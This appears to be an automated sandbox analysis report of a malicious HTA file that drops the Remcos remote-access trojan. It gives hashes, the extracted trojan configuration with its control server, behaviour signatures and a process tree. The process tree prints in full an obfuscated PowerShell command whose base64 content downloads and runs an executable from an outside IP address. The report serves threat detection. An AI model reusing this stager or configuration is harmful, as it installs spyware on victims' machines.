Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
16-12-2024 16:25
Behavioral task
behavioral1
Sample
newthingswithgreatupdateiongivenbestthingswithme.hta
Resource
win7-20240903-en
General
-
Target
newthingswithgreatupdateiongivenbestthingswithme.hta
-
Size
143KB
-
MD5
fd6fc3abb81de5133fb2de54b937ca20
-
SHA1
241f7fa153504078a9a9b07f966f3c4e862a9545
-
SHA256
73d0a015a1d5a1a846d3451a8ba70964c56581b06279208cb87c6c2eea1a6644
-
SHA512
5c37a3432112eb422e264101706a1c9e5bb7c266f064e8618b96e7e6e185800ffdf315d02f27cc23cd07e6a854bbbe19ccb5173eff885f8c808d76d6dab86516
-
SSDEEP
768:tlEHKFlVum2oum2QB3S5KUJDVUKhC74GVf/AyK+v6Aq1Xl7zPRDIfz9esnkoFfz7:tl
Malware Config
Extracted
remcos
elvis
107.173.4.16:2560
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-GJDISH
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 3004 powershell.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 1 IoCs
pid Process 3004 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 2452 nicetomeetyousweeet.exe -
Loads dropped DLL 4 IoCs
pid Process 3004 powershell.exe 3004 powershell.exe 3004 powershell.exe 3004 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3004 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3004 powershell.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 3068 wrote to memory of 2708 3068 mshta.exe 30 PID 3068 wrote to memory of 2708 3068 mshta.exe 30 PID 3068 wrote to memory of 2708 3068 mshta.exe 30 PID 3068 wrote to memory of 2708 3068 mshta.exe 30 PID 2708 wrote to memory of 3004 2708 cmd.exe 32 PID 2708 wrote to memory of 3004 2708 cmd.exe 32 PID 2708 wrote to memory of 3004 2708 cmd.exe 32 PID 2708 wrote to memory of 3004 2708 cmd.exe 32 PID 3004 wrote to memory of 2892 3004 powershell.exe 33 PID 3004 wrote to memory of 2892 3004 powershell.exe 33 PID 3004 wrote to memory of 2892 3004 powershell.exe 33 PID 3004 wrote to memory of 2892 3004 powershell.exe 33 PID 2892 wrote to memory of 2828 2892 csc.exe 34 PID 2892 wrote to memory of 2828 2892 csc.exe 34 PID 2892 wrote to memory of 2828 2892 csc.exe 34 PID 2892 wrote to memory of 2828 2892 csc.exe 34 PID 3004 wrote to memory of 2452 3004 powershell.exe 36 PID 3004 wrote to memory of 2452 3004 powershell.exe 36 PID 3004 wrote to memory of 2452 3004 powershell.exe 36 PID 3004 wrote to memory of 2452 3004 powershell.exe 36
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\newthingswithgreatupdateiongivenbestthingswithme.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/C PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'JHJIQVp5bkw1UG1uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRFZkluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtidUtvVmpvYUxlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwWWZJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMa0ZHT09RclBIUix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdzeE9URlFFZXAsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFoWFEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImlSRFN1IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5sT0NzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHJIQVp5bkw1UG1uOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc5LjE2Ni83NS9lY29tZS5leGUiLCIkRW52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUiLDAsMCk7U1RBUlQtU2xFRXAoMyk7aU52b0tFLWVYUFJlU1NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNldG9tZWV0eW91c3dlZWV0LmV4ZSI='+[cHAR]0x22+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'JHJIQVp5bkw1UG1uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRFZkluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtidUtvVmpvYUxlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwWWZJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMa0ZHT09RclBIUix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdzeE9URlFFZXAsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFoWFEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImlSRFN1IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5sT0NzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHJIQVp5bkw1UG1uOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc5LjE2Ni83NS9lY29tZS5leGUiLCIkRW52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUiLDAsMCk7U1RBUlQtU2xFRXAoMyk7aU52b0tFLWVYUFJlU1NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNldG9tZWV0eW91c3dlZWV0LmV4ZSI='+[cHAR]0x22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iumviw0b.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2892 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8D81.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8D80.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:2828
-
-
-
C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe"C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe"4⤵
- Executes dropped EXE
PID:2452
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5cfbf1a73f9f344a92b29947c22823001
SHA167b0e360c270a1c7dcf66a3f9dff86d2e5755a36
SHA25672464933b2beaf9006887fde1dd2be8e8f49f7d2e8037b6cb9c8646e408ecd97
SHA512bc82fbed7360bdd441a9267ef5cbe5c8eabb156d1baed19ec5a3da119872603714c7a82574c4c3bbf8a07a2e903959ac21f0ea0f5a002acb693f30833d0f3008
-
Filesize
3KB
MD52aff9539d8b5496867446be0a11a34cb
SHA13cc76f53f21330ad4519f64852ca1b9b0d8222b4
SHA2560814f73abbfbd19d11606bffd7d626a1b22c3845b1fa4da7fb64879b003b9477
SHA51238344a335bfa899a9f0d7530526b744eaa6f51bc8c8cb2abbda877e7f137a4f3188c2867cfc8b457f9ad4f03bb7785d0b39c11a2fa6c00805121f6b627ab1f55
-
Filesize
7KB
MD5407a41d005178439a8a2de2ec3aea9f6
SHA1839cf6acb8f6a63f8e118c2a6fc45b2e874245e5
SHA2563d41fe5ddbc60fac9686d505d15c650557b0032cefc9327b03b27a788cd44503
SHA512aa82badc314a786c03437d97d6a6aae07106bbf36e90c0051fab8d898ec43f25600348a25040f337ebcce3e57c3da0dca71c9f393eb65cb029bfeaff437ba26e
-
Filesize
652B
MD58fbc1b368c131e5ff1f2451990f26a47
SHA101554756afed2eab07c6db91758bcf2b4733e062
SHA2561679bb6f4eec5e1b41a914c56098ba87d680b1ba2609f066243de398350d3ee2
SHA512e8bea5db6a078b0a79123ceaa28e0c99f23e1065537450c985ea7d63a1e93aa14bf7179be1e703f6782d543f8627973275deafc2808583947936be860a651ca1
-
Filesize
493B
MD500df4ae943d803cb15795b1fd55ead94
SHA1fc1509b646d150cc4d1c2d92cf772be4af67716b
SHA256e8d13d324b35fc23a6729caa22125343bfebb09476a9334e93e8c1804ce6314a
SHA512e40826e83f25a3be3fdf26c1d5a667d0eb40d53d3f0fe46f8cc395152cd1eb46b98e193fc3a3f06b6cefadbed030d2a90a5575c1d235228d53d5f152d2e85796
-
Filesize
309B
MD5b9e3642d722cc8e7c53eb586d85ae917
SHA1dd360fb19d03823012ccb02f3b9c47e73fd67615
SHA2564a95fb947c304436645f5e1d0dbd24de06faeba95624649dc1341b0aea45cca6
SHA5123065ce2e013087d64ef3852f95fb2bb511b8472f903bb943ff752e3658360b6ddbc496d2dcfee9135d465317e58dbedbf262a8f7191089f7b305d3c31e9a980a
-
Filesize
528KB
MD5a2d03c5333bfecca62720cd6ee3a4dc4
SHA1ce4c380f2748f375904c17b38d4f93e294fef4f6
SHA256ef8ec5181ab4cf85a5c4867089594f40900eaafb514496905eb86314c460178e
SHA5125c9db8bb415da332c0adc24519ae0410a65aba932de15a682ce57efbc61b8b7d7e5e3548164909a5da5bc6966c351528626655fdbb7c21f3b4fd1974406ae04c